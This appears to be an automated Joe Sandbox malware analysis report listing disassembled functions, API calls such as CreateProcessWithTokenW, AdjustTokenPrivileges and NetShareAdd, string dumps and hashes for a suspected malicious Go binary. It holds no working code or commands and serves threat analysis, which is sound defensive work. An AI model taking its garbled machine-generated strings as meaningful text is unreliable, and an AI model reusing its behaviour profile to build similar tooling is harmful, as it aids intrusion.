sp=) = ) m=+Inf-Inf: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabpiperootsbrksse3trueuint ... MB, and cnt= got, xrefs: 0082F93B, 0082FF1C
gopa, xrefs: 0082FD29
: unexpected return pc for CertEnumCertificatesInStoreEaster Island Standard TimeG waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not wait, xrefs: 0082F029
:<=CLMPSZ[\]_hs{} + @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEAT, xrefs: 0082FB8B, 0082FDFA
(...), i = , not ArabicBrahmiCarianChakmaCommonCopticGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11WanchoYezidiefencelistenobjectpopcntrdtscpselectsocketstringst, xrefs: 0082FB45
traceback: unexpected SPWRITE function transport endpoint is already connectedaddress family not supported by protocolbulkBarrierPreWrite: unaligned argumentscannot free workbufs when work.full != 0failed to acquire lock to reset capacityinvalid span in heapAr, xrefs: 0083028A

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: stack=[cgocheckcs deadlockfs gs no anodepollDescr10 r11 r12 r13 r14 r15 r8 r9 rax rbp rbx rcx rdi rflags rip rsi rsp runnablerwmutexRrwmutexWscavengeshutdowntraceBuftrigger=unkn$ called from flushedWork idlethreads= is nil, not nStackRoots= pluginpath= s.spanclass= span.base()= syscalltick= work.nproc= work.nwait= , gp->status=, not pointer-byte block (: unknown pc CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_Gondi$ fp= is lr: of pc= sp: sp=) = ) m=+Inf-Inf: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabpiperootsbrksse3trueuint$ sp=) = ) m=+Inf-Inf: p=ACDTACSTAEDTAESTAKDTAKSTAWSTAhomCESTChamDashEESTGOGCLEAFLisuMiaoModiNZDTNZSTNewaSASTThaim=] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabpiperootsbrksse3trueuint ... MB, and cnt= got$ top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicSTermTakriTamil] = (arrayclosedeferfalsefaultgcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3$(...), i = , not ArabicBrahmiCarianChakmaCommonCopticGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11WanchoYezidiefencelistenobjectpopcntrdtscpselectsocketstringst$: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPau_Cin_HauRegCloseKeySetFileTimeSignWri$: unexpected return pc for CertEnumCertificatesInStoreEaster Island Standard TimeG waiting list is corruptedaddress not a stack addresschannel number out of rangecommunication error on sendcould not find QPC syscallsfailed to set sweep barriergcstopm: not wait$: unknown pc CertOpenStoreFindNextFileWFreeAddrInfoWGC sweep waitGunjala_GondiMapViewOfFileMasaram_GondiMende_KikakuiModule32NextWOld_HungarianRegDeleteKeyWRegEnumKeyExWRegEnumValueWRegOpenKeyExWRtlMoveMemoryVirtualUnlockWriteConsoleWbad flushGen bad map state$:<=CLMPSZ[\]_hs{} + @ P [(") ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEAT$] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabpiperootsbrksse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmerLati$gentraceback callback cannot be used with non-zero skipmheap.freeSpanLocked - invalid free of user arena chunkos: invalid use of WriteAt on file opened with O_APPENDfailed to allocate aligned heap memory; too many retriesin gcMark expecting to see gcphase as _$gentraceback cannot trace user goroutine on its own stackruntime: checkmarks found unexpected unmarked object obj=addr range base and limit are not in the same memory segmentmanual span allocation called with non-manually-managed typeruntime: GetQueuedCompleti$gopa$runtime.$runtime: g runtime: p scheddetailsecur32.dllshell32.dllshort writetracealloc(unreachableuserenv.dll B (goal KiB total, MB stacks, [recovered] allocCount found at *( gcscandone m->gsignal= maxTrigger= nDataRoots= nSpanRoots= pages/byte preemptoff= s.$runtime: gs.state = schedtracesemacquiresetsockoptstackLargetracefree(tracegc()unknown pcws2_32.dll of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= sched$runtime: traceback stuck. pc=scanobject of a noscan objectsemacquire not on the G stackstring concatenation too longtimeBegin/EndPeriod not foundtoo many open files in system (types from different scopes) in prepareForSweep; sweepgen locals stack map entries $traceback did not unwind completelytransport endpoint is not connected) is larger than maximum page size () is not Grunnable or Gscanrunnable0123456789abcdefghijklmnopqrstuvwxyzGo pointer stored into non-Go memoryUnable to determine system directoryaccessed d$traceback stuck already; errno= mheap.sweepgen= not in ranges: untyped locals , not a function0123456789abcdefCreateDirectoryWDnsNameCompare_WDuplicateTokenExEnumChildWindowsFlushFileBuffersGC scavenge waitGC worker (idle)GODEBUG: value "GetComputerNameWGetCu$traceback: unexpected SPWRITE function transport endpoint is already connectedaddress family not supported by protocolbulkBarrierPreWrite: unaligned argumentscannot free workbufs when work.full != 0failed to acquire lock to reset capacityinvalid span in heapAr$tracebackwbufSpans} stack=[ MB goal, flushGen gfreecnt= heapGoal= pages at ptrSize= runqsize= runqueue= s.base()= spinning= stopwait= sweepgen sweepgen= targetpc= throwing= until pc=, bound = , limit = /dev/stdinBad varintCancelIoExChorasmianCreatePipeDep$unknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt to non-Go memory , locked to threadArab Standard TimeCaucasian_AlbanianCommandLineToArgvWCreateFileMappingWCuba Standard TimeFiji Standard TimeGC worker ($unknown pcws2_32.dll of size (targetpc= , plugin: KiB work, exp.) for freeindex= gcwaiting= idleprocs= in status mallocing= ms clock, nBSSRoots= p->status= s.nelems= schedtick= span.list= timerslen=) at entry+, elemsize=, npages = /dev/stderr/dev/stdo
API String ID: 0-2875633195
Opcode ID: b0464560f3625bbd62dfd62538281c5f645651f283aaf5ee7fbd99ff75905a76
Instruction ID: 5f7414becb6df2acf7f5cb9df981a36b25e43998205d78a3f55c165efc1c2948
Opcode Fuzzy Hash: b0464560f3625bbd62dfd62538281c5f645651f283aaf5ee7fbd99ff75905a76
Instruction Fuzzy Hash: 3AE20176209BD486CA719B16F4843DAB769F789B94F444126EFCD83B5ACF38C690CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA33D70F Relevance: 30.8, APIs: 16, Strings: 1, Instructions: 1022COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0000017DEA33D770

Part of subcall function 0000017DEA33D667: _getptd.LIBCMT ref: 0000017DEA33D67D
Part of subcall function 0000017DEA33D667: __updatetlocinfo.LIBCMT ref: 0000017DEA33D6B2
Part of subcall function 0000017DEA33D667: __updatetmbcinfo.LIBCMT ref: 0000017DEA33D6D9

_errno.LIBCMT ref: 0000017DEA33D775

Part of subcall function 0000017DEA33CE57: _getptd_noexit.LIBCMT ref: 0000017DEA33CE5B

_fileno.LIBCMT ref: 0000017DEA33D7A2

Part of subcall function 0000017DEA340C3B: _errno.LIBCMT ref: 0000017DEA340C44
Part of subcall function 0000017DEA340C3B: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA340C4F

write_multi_char.LIBCMT ref: 0000017DEA33DDD2
write_string.LIBCMT ref: 0000017DEA33DDEF
write_multi_char.LIBCMT ref: 0000017DEA33DE0C
write_string.LIBCMT ref: 0000017DEA33DE6B
write_multi_char.LIBCMT ref: 0000017DEA33DEC4
free.LIBCMT ref: 0000017DEA33DED8
_isleadbyte_l.LIBCMT ref: 0000017DEA33DFA9
write_char.LIBCMT ref: 0000017DEA33DFBF
write_char.LIBCMT ref: 0000017DEA33DFE0
_errno.LIBCMT ref: 0000017DEA33E0DA
_invalid_parameter_noinfo.LIBCMT ref: 0000017DEA33E0E5

Strings

, xrefs: 0000017DEA33DDA6

Memory Dump Source

Source File: 00000000.00000002.2893417364.0000017DEA320000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA320000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea320000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _errnowrite_multi_char$Locale_invalid_parameter_noinfowrite_charwrite_string$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_fileno_getptd_getptd_noexit_isleadbyte_lfree
String ID:
API String ID: 2950348734-3916222277
Opcode ID: 44556820cebba1103ceb5094a228a3c63f1b381211d8945892cc43e8bddeb570
Instruction ID: 585d6fa674f3b19aa83b7ad24cca22fd04429b95eed947a39317505a04291287
Opcode Fuzzy Hash: 44556820cebba1103ceb5094a228a3c63f1b381211d8945892cc43e8bddeb570
Instruction Fuzzy Hash: 1D620A3091C64E4AF76B9A98AC413F9B7F1FFD5341F24091DD4AF8B1E1DE249A0A8643

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7361A8 Relevance: 26.0, APIs: 10, Strings: 7, Instructions: 545COMMONLIBRARYCODE

Download Yara Rule

APIs

_snprintf.LIBCMT ref: 0000017DEA7363D6
_snprintf.LIBCMT ref: 0000017DEA7363F3
_snprintf.LIBCMT ref: 0000017DEA736315

Part of subcall function 0000017DEA73B5DC: _errno.LIBCMT ref: 0000017DEA73B613
Part of subcall function 0000017DEA73B5DC: _invalid_parameter_noinfo.LIBCMT ref: 0000017DEA73B61E

_snprintf.LIBCMT ref: 0000017DEA736648
_snprintf.LIBCMT ref: 0000017DEA7369A4

Strings

%s&%s, xrefs: 0000017DEA7368DA
%s%s, xrefs: 0000017DEA736637, 0000017DEA736661, 0000017DEA736805, 0000017DEA736996
?%s, xrefs: 0000017DEA7368C7
%s&%s=%s, xrefs: 0000017DEA7363E7
?%s=%s, xrefs: 0000017DEA7363CA
%s%s, xrefs: 0000017DEA736747
%s%s: %s, xrefs: 0000017DEA736304

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: _snprintf$_errno_invalid_parameter_noinfo
String ID: %s%s$%s%s$%s%s: %s$%s&%s$%s&%s=%s$?%s$?%s=%s
API String ID: 3442832105-1222817042
Opcode ID: 636a98fa85514209f70005b04ca8ead89b4190e8157d1dcb912aa2d8a0183636
Instruction ID: eab560b7ce217d9bd09542299eb946828617ea622c308b09c7aafb15121f7bd4
Opcode Fuzzy Hash: 636a98fa85514209f70005b04ca8ead89b4190e8157d1dcb912aa2d8a0183636
Instruction Fuzzy Hash: 3842837260CE8A91E617EB19E0012F9A3B0FFD4795F155121DFCD1BA61EF38D2A68301

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA730ED4 Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 150filetimeCOMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 0000017DEA730F07

Part of subcall function 0000017DEA73B228: _FF_MSGBANNER.LIBCMT ref: 0000017DEA73B258
Part of subcall function 0000017DEA73B228: _NMSG_WRITE.LIBCMT ref: 0000017DEA73B262
Part of subcall function 0000017DEA73B228: HeapAlloc.KERNEL32 ref: 0000017DEA73B27D
Part of subcall function 0000017DEA73B228: _callnewh.LIBCMT ref: 0000017DEA73B296
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2A1
Part of subcall function 0000017DEA73B228: _errno.LIBCMT ref: 0000017DEA73B2AC

Part of subcall function 0000017DEA72CFCC: malloc.LIBCMT ref: 0000017DEA72CFDF

Part of subcall function 0000017DEA72CFFC: htonl.WS2_32 ref: 0000017DEA72D007

GetCurrentDirectoryA.KERNEL32 ref: 0000017DEA730F7F
FindFirstFileA.KERNEL32 ref: 0000017DEA730FB8
GetLastError.KERNEL32 ref: 0000017DEA730FC7
free.LIBCMT ref: 0000017DEA731002
free.LIBCMT ref: 0000017DEA73100F

Part of subcall function 0000017DEA73B1E8: HeapFree.KERNEL32 ref: 0000017DEA73B1FE
Part of subcall function 0000017DEA73B1E8: _errno.LIBCMT ref: 0000017DEA73B208
Part of subcall function 0000017DEA73B1E8: GetLastError.KERNEL32 ref: 0000017DEA73B210

FileTimeToSystemTime.KERNEL32 ref: 0000017DEA73101C
SystemTimeToTzSpecificLocalTime.KERNEL32 ref: 0000017DEA73102D
FindNextFileA.KERNEL32 ref: 0000017DEA7310EA
FindClose.KERNEL32 ref: 0000017DEA7310FB

Strings

.\*, xrefs: 0000017DEA730F63
F%I64d%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 0000017DEA7310CD
D0%02d/%02d/%02d %02d:%02d:%02d%s, xrefs: 0000017DEA73106F
%s, xrefs: 0000017DEA730F9D

Memory Dump Source

Source File: 00000000.00000002.2893583367.0000017DEA720000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000017DEA720000, based on PE: true

Associated: 00000000.00000002.2893583367.0000017DEA761000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA764000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA767000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76B000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2893583367.0000017DEA76D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_17dea720000_7xRIr23y7v.jbxd

Yara matches

Similarity

API ID: Time$FileFind_errno$ErrorHeapLastSystemfreemalloc$AllocCloseCurrentDirectoryFirstFreeLocalNextSpecific_callnewhhtonl
String ID: %s$.\*$D0%02d/%02d/%02d %02d:%02d:%02d%s$F%I64d%02d/%02d/%02d %02d:%02d:%02d%s
API String ID: 723279517-1754256099
Opcode ID: 6ee2af1134a4c9c9c702069b3ed1fb112293960f288e153385e9598e844af32e
Instruction ID: 36906a530154dbe9b16da609d0fd2f9680c9b5fe827ec2f5625fb1c640df4c09
Opcode Fuzzy Hash: 6ee2af1134a4c9c9c702069b3ed1fb112293960f288e153385e9598e844af32e
Instruction Fuzzy Hash: 5061847130875A86E711EB61F4406EEA7B1FBC4B94F504425EA8D4BB99DF7CC60ACB01

Uniqueness

Uniqueness Score: -1.00%

Function 00805760 Relevance: 19.3, Strings: 15, Instructions: 555COMMON

Download Yara Rule

Strings

, ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ, xrefs: 00805AE5, 00805B05, 00805F4F, 00805F6F
] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabpiperootsbrksse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmer, xrefs: 00805F2F
, j0 = : type AvestanBengaliBrailleCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUNKNOWNWSARecvWSASendtypes value=connectc, xrefs: 00805FDA
bad summary databad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remoterefl, xrefs: 00805B6F, 008062EC
runtime: npages = runtime: range = {runtime: textAddr stopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=Alta, xrefs: 00805B45
), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTIS, xrefs: 00805B25
][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinfmagc, xrefs: 00805AA5, 00805F13
runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningupdate during transition bytes failed with errno= to unused region of spanAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironme, xrefs: 00806025
runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = runtime: traceback stuck. pc=scanobject of a noscan objectsemacquire not on the G stac, xrefs: 008060A5
runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcwait for GC cyclewrong medium type but, xrefs: 00805F9E
, i = , not ArabicBrahmiCarianChakmaCommonCopticGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11WanchoYezidiefencelistenobjectpopcntrdtscpselectsocketstringstructsw, xrefs: 00806045
] = (arrayclosedeferfalsefaultgcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...), xrefs: 00805AC5
runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt t, xrefs: 00805A8A, 00805EEE
, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPau_Cin, xrefs: 00805FBC
, levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Standard TimeEastern Standard TimeGetProfilesDirectoryWInscriptional_PahlaviLookupPrivilegeValueWMagadan Standard TimeMorocco , xrefs: 008060C5

Memory Dump Source

Source File: 00000000.00000002.2891507426.00000000007E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007E0000, based on PE: true

Associated: 00000000.00000002.2891371000.00000000007E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891558205.0000000000853000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891613538.00000000008D5000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891633543.00000000008D9000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891652974.00000000008DA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891672395.00000000008DB000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.00000000008E7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000090E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.0000000000914000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891687208.000000000093C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891756774.0000000000940000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2891773031.0000000000941000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7e0000_7xRIr23y7v.jbxd

Similarity

API ID:
String ID: ), ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTIS$, ->: > CcCfCoCsLlLmLoLtLuMcMeMnNdNlNoPcPdPePfPiPoPsScSkSmSoYiZlZpZs")" ][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJ$, i = , not ArabicBrahmiCarianChakmaCommonCopticGetACPGothicHangulHatranHebrewHyphenKaithiKhojkiLepchaLycianLydianRejangSCHED SyriacTai_LeTangutTeluguThaanaUTC+12UTC+13UTC-02UTC-08UTC-09UTC-11WanchoYezidiefencelistenobjectpopcntrdtscpselectsocketstringstructsw$, j0 = : type AvestanBengaliBrailleCopySidCypriotDeseretElbasanElymaicGODEBUGGranthaHanunooIO waitKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaRadicalSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaUNKNOWNWSARecvWSASendtypes value=connectc$, levelBits[level] = AdjustTokenPrivilegesAlaskan Standard TimeAnatolian_HieroglyphsArabian Standard TimeBelarus Standard TimeCentral Standard TimeEastern Standard TimeGetProfilesDirectoryWInscriptional_PahlaviLookupPrivilegeValueWMagadan Standard TimeMorocco $, npages = /dev/stderr/dev/stdout: frame.sp=CloseHandleCreateFileWDeleteFileWDives_AkuruExitProcessFreeLibraryGOMEMLIMIT=GOTRACEBACKGetFileTypeIdeographicMedefaidrinMoveFileExWNandinagariNetShareAddNetShareDelNew_Tai_LueOld_PersianOld_SogdianOpenProcessPau_Cin$] = (arrayclosedeferfalsefaultgcinggscanhchaninit int16int32int64mheapntohspanicscav schedsleepslicesse41sse42ssse3sudogsweeptraceuint8usage B -> addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util(...)$] = ] n=allgallpavx2basebindbmi1bmi2boolcas1cas2cas3cas4cas5cas6chandeadermsfilefuncidleint8itabpiperootsbrksse3trueuint ... MB, and cnt= got= max= ms, ptr tab= top=+0330+0430+0530+0545+0630+0845+1030+1245+1345, fp:-0930AdlamBamumBatakBuhidDograGreekKhmer$][]i)msn=nss us} G M P ) *( - < > m= n=%: +00+01+03+04+05+06+07+08+09+10+11+12+13+14-01-02-03-04-05-06-08-09-11-12...???ADTASTBSTCATCDTCETCSTEATEDTEETEOFESTGMTHDTHSTHanIDTISTJSTKSTLaoMDTMSKMSTMroNDTNSTNaNNkoPC=PDTPKTPSTUTCVaiWAT]:adxaesavxendfinfmagc$bad summary databad symbol tablecastogscanstatusgc: unswept spangcshrinkstackoffinteger overflowinvalid argumentinvalid exchangeinvalid g statusmSpanList.insertmSpanList.removemessage too longmissing stackmapno route to hostnon-Go functionobject is remoterefl$runtime: level = runtime: nameOff runtime: pointer runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcwait for GC cyclewrong medium type but$runtime: levelShift[level] = runtime: marking free object runtime: p.gcMarkWorkerMode= runtime: split stack overflowruntime: sudog with non-nil cruntime: summary max pages = runtime: traceback stuck. pc=scanobject of a noscan objectsemacquire not on the G stac$runtime: npages = runtime: range = {runtime: textAddr stopping the worldstreams pipe errorsync.RWMutex.RLocksystem page size (tracebackancestorsuse of closed filevalue out of range [controller reset] called using nil *, g->atomicstatus=, gp->atomicstatus=Alta$runtime: p.searchAddr = span has no free objectsstack trace unavailablestructure needs cleaningupdate during transition bytes failed with errno= to unused region of spanAUS Central Standard TimeAUS Eastern Standard TimeAfghanistan Standard TimeExpandEnvironme$runtime: summary[runtime: textOff runtime: typeOff scanobject n == 0select (no cases)stack: frame={sp:swept cached spansync.RWMutex.Lockthread exhaustionunknown caller pcwait for GC cyclewrong medium type but memory size because dotdotdot in async preempt t
API String ID: 0-952052641
Opcode ID: 464927ccac293282f65e7244e00a2e0f35ea151c06f8d9880d1115ba1d836c24
Instruction ID: c1c6c1c2016cb6cefc7e65006dbd0f882d87a3f232863af82894fa81a6ac582d
Opcode Fuzzy Hash: 464927ccac293282f65e7244e00a2e0f35ea151c06f8d9880d1115ba1d836c24
Instruction Fuzzy Hash: 7B329E76318BC881DB60DB19F8413DAA369F789BC4F408522DE8D97B99DF38C695CB01

Uniqueness

Uniqueness Score: -1.00%

Function 0000017DEA7301E8 Relevance: 18.2, APIs: 12, Instructions: 157processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserA.ADVAPI32 ref: 0000017DEA730243
GetLastError.KERNEL32 ref: 0000017DEA730251
GetLastError.KERNEL32 ref: 0000017DEA730275

Part of subcall function 0000017DEA72F9F4: MultiByteToWideChar.KERNEL32 ref: 0000017DEA72FA21
Part of subcall function 0000017DEA72F9F4: MultiByteToWideChar.KERNEL32 ref: 0000017DEA72FA49

CreateProcessA.KERNEL32 ref: 0000017DEA7302C7
GetLastError.KERNEL32 ref: 0000017DEA7302D1
GetCurrentDirectoryW.KERNEL32 ref: 0000017DEA730625
GetCurrentDirectoryW.KERNEL32 ref: 0000017DEA73063F
CreateProcessWithTokenW.ADVAPI32 ref: 0000017DEA730683

Memory Dump Source

